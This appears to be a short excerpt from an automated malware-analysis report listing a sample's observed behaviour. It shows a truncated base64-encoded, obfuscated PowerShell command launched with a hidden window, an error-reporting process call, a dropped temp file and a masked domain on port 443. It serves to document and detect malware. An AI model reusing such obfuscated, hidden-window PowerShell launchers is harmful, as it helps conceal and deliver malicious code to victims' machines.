Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYQBpAGwAYgBxAD0AKAAoACcAQgAnACsAJwBoADYAJwApACsAKAAnAGQAeQAnACsAJwA5ACcAKQArACcAYQAnACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHQARQBNAFAAXAB3AG8AUgBkAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1400
- %TEMP%\839971.cvr
- 'gn##ur.com':443
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYQBpAGwAYgBxAD0AKAAoACcAQgAnACsAJwBoADYAJwApACsAKAAnAGQAeQAnACsAJwA5ACcAKQArACcAYQAnACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHQARQBNAFAAXAB3AG8AUgBkAF...' (with hidden window)